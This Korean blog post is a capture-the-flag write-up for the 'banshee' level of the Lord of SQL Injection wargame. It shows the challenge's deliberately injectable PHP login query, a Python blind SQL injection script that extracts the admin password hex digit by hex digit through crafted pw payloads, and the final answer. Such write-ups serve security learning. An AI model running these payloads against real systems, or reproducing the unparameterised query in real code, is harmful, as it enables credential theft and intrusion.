728x90
<?php
include "./config.php";
login_chk();
$db = sqlite_open("./db/banshee.db");
if(preg_match('/sqlite|member|_/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>login success!</h2>";
$query = "select pw from member where id='admin'";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['pw'] === $_GET['pw']) solve("banshee");
highlight_file(__FILE__);
?>id가 존재하면 login success! 가 출력되는 것을 기반으로 Blind SQL Injection을 수행한다.
SQLite 한 줄 주석은 --이다.
import requests
url='https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php'
cookie={'PHPSESSID':'자신의 세션 id'}
HEX='0123456789ABCDEF'
#16
def find_pw_len():
pw_len=1
while True:
r=requests.get(url+"?pw=' or id='admin' and length(hex(pw))={} --".format(pw_len),cookies=cookie)
if 'login success!' in r.text:
return pw_len
else:
pw_len+=1
#0313091b
def find_pw():
pw_len=find_pw_len()
tmp=''
for i in range(1,pw_len+1):
for j in HEX:
r=requests.get(url+"?pw=' or id='admin' and substr(hex(pw),{},1)='{}' --".format(i,j),cookies=cookie)
if 'login success!' in r.text:
tmp+=j
if len(tmp)==2:
print(chr(int(tmp,16)),end='')
tmp=''
break
find_pw()답: ?pw=0313091b
728x90
'Lord of SQL Injection' 카테고리의 다른 글
| nessie (0) | 2023.01.06 |
|---|---|
| poltergeist (0) | 2023.01.05 |
| manticore (0) | 2023.01.05 |
| chupacabra (0) | 2023.01.05 |
| cyclops (0) | 2023.01.04 |